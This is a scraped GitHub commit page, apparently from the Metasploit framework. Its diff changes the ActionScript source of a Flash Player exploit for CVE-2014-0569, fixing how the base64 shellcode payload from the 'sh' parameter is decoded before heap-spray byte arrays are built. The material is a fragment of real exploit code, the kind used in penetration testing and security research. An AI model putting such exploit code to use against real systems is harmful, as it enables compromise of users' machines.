We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent e0a1fa4 commit d78d04eCopy full SHA for d78d04e
data/exploits/CVE-2014-0569/msf.swf
88 Bytes
external/source/exploits/CVE-2014-0569/Main.as
@@ -31,10 +31,13 @@ package
31
{
32
var i:uint = 0
33
var j:uint = 0
34
-
35
- b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
36
- payload = b64.toByteArray().toString();
37
+
+ var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+ var pattern:RegExp = / /g;
+ b64_payload = b64_payload.replace(pattern, "+")
38
+ b64.decode(b64_payload)
39
+ payload = b64.toByteArray().toString()
40
41
for (i = 0; i < defrag.length; i++) {
42
defrag[i] = new ByteArray()
43
defrag[i].length = BYTE_ARRAY_SIZE
0 commit comments